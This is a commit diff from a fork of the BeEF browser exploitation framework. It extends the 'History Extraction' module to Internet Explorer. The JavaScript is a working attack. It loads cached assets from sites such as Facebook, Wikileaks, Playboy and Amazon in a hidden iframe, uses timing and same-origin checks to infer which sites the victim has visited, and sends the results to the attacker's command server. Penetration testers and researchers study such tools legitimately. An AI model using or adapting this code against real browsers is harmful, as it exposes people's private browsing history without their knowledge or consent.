Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Fix Issue 88 - Working for IE and Firefox

Browse Source
This commit is contained in:
root
2012-03-11 11:38:47 -04:00
parent a0c11fa695
commit 847b798e0a
3 changed files with 193 additions and 88 deletions
Download Patch File Download Diff File Expand all files Collapse all files

276
modules/browser/get_history/command.js
View File

@@ -14,7 +14,6 @@
// limitations under the License.
//
var hidden_iframe = beef.dom.createInvisibleIframe();
hidden_iframe.setAttribute('id','f');
hidden_iframe.setAttribute('name','f');
@@ -24,6 +23,9 @@ hidden_iframe.setAttribute('style','opacity: 0.1');
var results = "";
var tries = 0;
var isIE = 0;
var isFF = 0;
/*******************************
* SUB-MS TIMER IMPLEMENTATION *
*******************************/
@@ -39,56 +41,104 @@ function timer_interrupt() {
}
}
window.addEventListener('message', timer_interrupt, false);
if (beef.browser.isFF() == 1) {
window.addEventListener('message', timer_interrupt, false);
/****************
* SCANNED URLS *
****************/
var targets = [
{ 'category': 'Social networks' },
{ 'name': 'Facebook', 'urls': [ 'https://s-static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
'http://static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
'http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HN0ehA1zox_.js' ] },
{ 'name': 'Google Plus', 'urls': [ 'https://ssl.gstatic.com/gb/js/abc/gcm_57b1882492d4d0138a0a7ea7240394ca.js' ] },
{ 'name': 'Dogster', 'urls': [ 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js.gz',
'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js' ] },
{ 'name': 'MySpace', 'urls': [ 'http://x.myspacecdn.com/modules/common/static/css/futuraglobal_kqj36l0b.css' ] },
{ 'category': 'Content platforms' },
{ 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/cssbin/www-refresh-vflMpNCTQ.css' ] },
{ 'name': 'Hulu', 'urls': [ 'http://static.huluim.com/system/hulu_0cd8f497_1.css' ] },
{ 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/css/c_fold_main.css.v109886.64777.105425.23' ] },
{ 'name': 'JustinBieberMusic.com', 'urls': [ 'http://www.justinbiebermusic.com/underthemistletoe/js/fancybox.js' ] },
{ 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/styles.css' /* 4h */ ] },
{ 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/squelettes/jquery-1.6.4.min.js' ] },
{ 'category': 'Online media' },
{ 'name': 'New York Times', 'urls': [ 'http://js.nyt.com/js2/build/sitewide/sitewide.js' ] },
{ 'name': 'CNN', 'urls': [ 'http://z.cdn.turner.com/cnn/tmpl_asset/static/www_homepage/835/css/hplib-min.css',
'http://z.cdn.turner.com/cnn/tmpl_asset/static/intl_homepage/564/css/intlhplib-min.css' ] },
{ 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/reddit.en-us.xMviOWUyZqo.js' ] },
{ 'name': 'Slashdot', 'urls': [ 'http://a.fsdn.com/sd/classic.css?release_20111207.02' ] },
{ 'name': 'Fox News', 'urls': [ 'http://www.fncstatic.com/static/all/css/head.css?1' ] },
{ 'name': 'AboveTopSecret.com', 'urls': [ 'http://www.abovetopsecret.com/forum/ats-scripts.js' ] },
{ 'category': 'Commerce' },
{ 'name': 'Diapers.com', 'urls': [ 'http://c1.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12',
'http://c3.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12' ] },
{ 'name': 'Expedia', 'urls': [ 'http://www.expedia.com/static/default/default/scripts/expedia/core/e.js?v=release-2011-11-r4.9.317875' ] },
{ 'name': 'Amazon (US)', 'urls': [ 'http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-css-quirks/site-wide-3527593236.css._V162874846_.css' ] },
{ 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/CSS/template.v1.w.5723.0.css' ] },
{ 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] }
];
/*************************
* CONFIGURABLE SETTINGS *
*************************/
var TIME_LIMIT = 5;
var MAX_ATTEMPTS = 2;
}
if (beef.browser.isIE() == 1) {
/****************
* SCANNED URLS *
****************/
var targets = [
{ 'category': 'Social networks' },
{ 'name': 'Facebook', 'urls': [ 'http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png',
'https://s-static.ak.facebook.com/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png' ] },
{ 'name': 'Twitter', 'urls': [ 'http://twitter.com/phoenix/favicon.ico',
'https://twitter.com/phoenix/favicon.ico' ] },
{ 'name': 'LinkedIn', 'urls': [ 'http://static01.linkedin.com/scds/common/u/img/sprite/sprite_global_v6.png',
'http://s3.licdn.com/scds/common/u/img/logos/logo_2_237x60.png',
'http://s4.licdn.com/scds/common/u/img/logos/logo_132x32_2.png' ] },
{ 'name': 'Orkut', 'urls': [ 'http://static3.orkut.com/img/gwt/logo_orkut_default.png' ] },
{ 'name': 'Dogster', 'urls': [ 'http://a2.cdnsters.com/static/images/sitewide/logos/dsterBanner-sm.png' ] },
{ 'category': 'Content platforms' },
{ 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/favicon-refresh-vfldLzJxy.ico' ] },
{ 'name': 'Hulu', 'urls': [ 'http://www.hulu.com/fat-favicon.ico' ] },
{ 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/favicon.ico' ] },
{ 'name': 'Wikipedia (EN)', 'urls': [ 'http://en.wikipedia.org/favicon.ico' ] },
{ 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/favicon.ico' ] },
{ 'category': 'Online media' },
{ 'name': 'New York Times', 'urls': [ 'http://css.nyt.com/images/icons/nyt.ico' ] },
{ 'name': 'CNN', 'urls': [ 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/hdr-main.gif',
'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/intl/hdr-globe-central.gif' ] },
{ 'name': 'Slashdot', 'urls': [ 'http://slashdot.org/favicon.ico',
'http://a.fsdn.com/sd/logo_w_l.png' ] },
{ 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/favicon.ico' ] },
{ 'name': 'Fox News', 'urls': [ 'http://www.foxnews.com/i/redes/foxnews.ico' ] },
{ 'name': 'AboveTopSecret.com', 'urls': [ 'http://files.abovetopsecret.com/images/atssitelogo-f.png' ] },
{ 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/IMG/wlogo.png' ] /* this session only */ },
{ 'category': 'Commerce' },
{ 'name': 'Diapers.com', 'urls': [ 'http://c4.diapers.com/Images/favicon.ico' ] },
{ 'name': 'Amazon (US)', 'urls': [ 'http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V169459313_.gif' ] },
{ 'name': 'eBay', 'urls': [ 'http://www.ebay.com/favicon.ico' ] },
{ 'name': 'Walmart', 'urls': [ 'http://www.walmart.com/favicon.ico' ] },
{ 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/Nest/Newegg.ico' ] }
];
/*************************
* CONFIGURABLE SETTINGS *
*************************/
var TIME_LIMIT = 1;
var MAX_ATTEMPTS = 1;
}
function sched_call(fn) {
exec_next = fn;
window.postMessage('123', '*');
}
/****************
* SCANNED URLS *
****************/
var targets = [
{ 'category': 'Social networks' },
{ 'name': 'Facebook', 'urls': [ 'https://s-static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
'http://static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
'http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HN0ehA1zox_.js' ] },
{ 'name': 'Google Plus', 'urls': [ 'https://ssl.gstatic.com/gb/js/abc/gcm_57b1882492d4d0138a0a7ea7240394ca.js' ] },
{ 'name': 'Dogster', 'urls': [ 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js.gz',
'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js' ] },
{ 'name': 'MySpace', 'urls': [ 'http://x.myspacecdn.com/modules/common/static/css/futuraglobal_kqj36l0b.css' ] },
{ 'category': 'Content platforms' },
{ 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/cssbin/www-refresh-vflMpNCTQ.css' ] },
{ 'name': 'Hulu', 'urls': [ 'http://static.huluim.com/system/hulu_0cd8f497_1.css' ] },
{ 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/css/c_fold_main.css.v109886.64777.105425.23' ] },
{ 'name': 'JustinBieberMusic.com', 'urls': [ 'http://www.justinbiebermusic.com/underthemistletoe/js/fancybox.js' ] },
{ 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/styles.css' /* 4h */ ] },
{ 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/squelettes/jquery-1.6.4.min.js' ] },
{ 'category': 'Online media' },
{ 'name': 'New York Times', 'urls': [ 'http://js.nyt.com/js2/build/sitewide/sitewide.js' ] },
{ 'name': 'CNN', 'urls': [ 'http://z.cdn.turner.com/cnn/tmpl_asset/static/www_homepage/835/css/hplib-min.css',
'http://z.cdn.turner.com/cnn/tmpl_asset/static/intl_homepage/564/css/intlhplib-min.css' ] },
{ 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/reddit.en-us.xMviOWUyZqo.js' ] },
{ 'name': 'Slashdot', 'urls': [ 'http://a.fsdn.com/sd/classic.css?release_20111207.02' ] },
{ 'name': 'Fox News', 'urls': [ 'http://www.fncstatic.com/static/all/css/head.css?1' ] },
{ 'name': 'AboveTopSecret.com', 'urls': [ 'http://www.abovetopsecret.com/forum/ats-scripts.js' ] },
{ 'category': 'Commerce' },
{ 'name': 'Diapers.com', 'urls': [ 'http://c1.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12',
'http://c3.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12' ] },
{ 'name': 'Expedia', 'urls': [ 'http://www.expedia.com/static/default/default/scripts/expedia/core/e.js?v=release-2011-11-r4.9.317875' ] },
{ 'name': 'Amazon (US)', 'urls': [ 'http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-css-quirks/site-wide-3527593236.css._V162874846_.css' ] },
{ 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/CSS/template.v1.w.5723.0.css' ] },
{ 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] }
];
/*************************
* CONFIGURABLE SETTINGS *
*************************/
var TIME_LIMIT = 5;
var MAX_ATTEMPTS = 2;
/**********************
* MAIN STATE MACHINE *
@@ -106,33 +156,70 @@ var start, stop, urls;
frame some time to fully load. */
function perform_check() {
wait_cycles = 0;
setTimeout(wait_for_read, 1);
if (beef.browser.isIE() == 1) {
setTimeout(wait_for_read, 0);
}
if (beef.browser.isFF() == 1) {
setTimeout(wait_for_read, 1);
}
}
/* Confirm that data:... is loaded correctly. */
function wait_for_read() {
if (wait_cycles++ > 100) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry');
return;
}
if (beef.browser.isFF() == 1) {
if (!frame_ready) {
setTimeout(wait_for_read, 1);
} else {
document.getElementById('f').contentWindow.stop();
setTimeout(navigate_to_target, 1);
}
}
if (beef.browser.isIE() == 1) {
try{
if (frames['f'].location.href != 'about:blank') throw 1;
//if(document.getElementById('f').contentWindow.location.href != 'about:blank') throw 1;
document.getElementById("f").src ='javascript:"<body onload=\'parent.frame_ready = true\'>"';
setTimeout(wait_for_read2, 0);
} catch (e) {
setTimeout(wait_for_read, 0);
}
}
}
function wait_for_read2() {
if (wait_cycles++ > 100) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry');
return;
}
if (!frame_ready) {
setTimeout(wait_for_read, 1);
setTimeout(wait_for_read2, 0);
} else {
document.getElementById('f').contentWindow.stop();
setTimeout(navigate_to_target, 1);
setTimeout(navigate_to_target, 1);
}
}
/* Navigate the frame to the target URL. */
function navigate_to_target() {
cycles = 0;
sched_call(wait_for_noread);
if (beef.browser.isFF() == 1) {
sched_call(wait_for_noread);
}
if (beef.browser.isIE() == 1) {
setTimeout(wait_for_noread, 0);
}
urls++;
document.getElementById("f").src = current_url;
}
/* The browser is now trying to load the destination URL. Let's see if
we lose SOP access before we hit TIME_LIMIT. If yes, we have a cache
hit. If not, seems like cache miss. In both cases, the navigation
@@ -140,44 +227,43 @@ function navigate_to_target() {
function wait_for_noread() {
try {
if (beef.browser.isIE() == 1) {
if (frames['f'].location.href == undefined){
confirmed_visited = true;
throw 1;
}
if (cycles++ >= TIME_LIMIT) {
maybe_test_next();
return;
}
setTimeout(wait_for_noread, 0);
}
if (beef.browser.isFF() == 1) {
if (document.getElementById('f').contentWindow.location.href == undefined)
{
confirmed_visited = true;
throw 1;
}
if (cycles >= TIME_LIMIT) {
maybe_test_next();
return;
}
sched_call(wait_for_noread);
if (cycles >= TIME_LIMIT) {
maybe_test_next();
return;
}
sched_call(wait_for_noread);
}
} catch (e) {
confirmed_visited = true;
maybe_test_next();
}
}
/* Just a logging helper. */
function log_text(str, type, cssclass) {
results+="<br>";
results+=str;
if(target_off==(targets.length-1)){
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+results);
setTimeout(reload,5000);
}
}
function reload(){
window.location.reload();
}
/* Decides what to do next. May schedule another attempt for the same target,
select a new target, or wrap up the scan. */
function maybe_test_next() {
frame_ready = false;
document.getElementById('f').src = 'data:text/html,<body onload="parent.frame_ready = true">';
if (beef.browser.isFF() == 1) {
document.getElementById('f').src = 'data:text/html,<body onload="parent.frame_ready = true">';
}
if (beef.browser.isIE() == 1) {
document.getElementById("f").src = 'about:blank';
}
if (target_off < targets.length) {
if (targets[target_off].category) {
//log_text(targets[target_off].category + ':', 'p', 'category');
@@ -200,30 +286,48 @@ function maybe_test_next() {
attempt++;
perform_check();
}
} //else {
//en = (new Date()).getTime();
//}
}
}
/* Just a logging helper. */
function log_text(str, type, cssclass) {
results+="<br>";
results+=str;
//alert(str);
if(target_off==(targets.length-1)){
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+results);
setTimeout(reload,3000);
}
}
function reload(){
//window.location.href=window.location.href;
window.location.reload();
}
/* Decides what to do next. May schedule another attempt for the same target,
select a new target, or wrap up the scan. */
/* The handler for "run the test" button on the main page. Dispenses
advice, resets state if necessary. */
function start_stuff() {
if (navigator.userAgent.indexOf('Firefox/') == -1) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox, and probably won\'t work for you.');
//alert('This proof-of-concept is specific to Firefox, and probably won\'t work for you.\n\n' +
// 'Versions for other browsers can be found here:\n' +
// 'http://lcamtuf.coredump.cx/cachetime/');
}
else{
target_off = 0;
if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 ) {
target_off = 0;
attempt = 0;
confirmed_visited = false;
urls = 0;
results = "";
maybe_test_next();
}
else {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox and Internet Explorer, and probably won\'t work for you.');
}
}
beef.execute(function() {
urls = undefined;
exec_next = null;

4
modules/browser/get_history/config.yaml
View File

@@ -19,7 +19,7 @@ beef:
enable: true
category: "Browser"
name: "History Extraction"
description: "This module will retrieve the session cookie from the current page."
description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/"
authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
target:
working: ["FF"]
working: ["FF","IE"]

1
modules/browser/get_history/module.rb
View File

@@ -13,6 +13,7 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Get_history < BeEF::Core::Command
def post_execute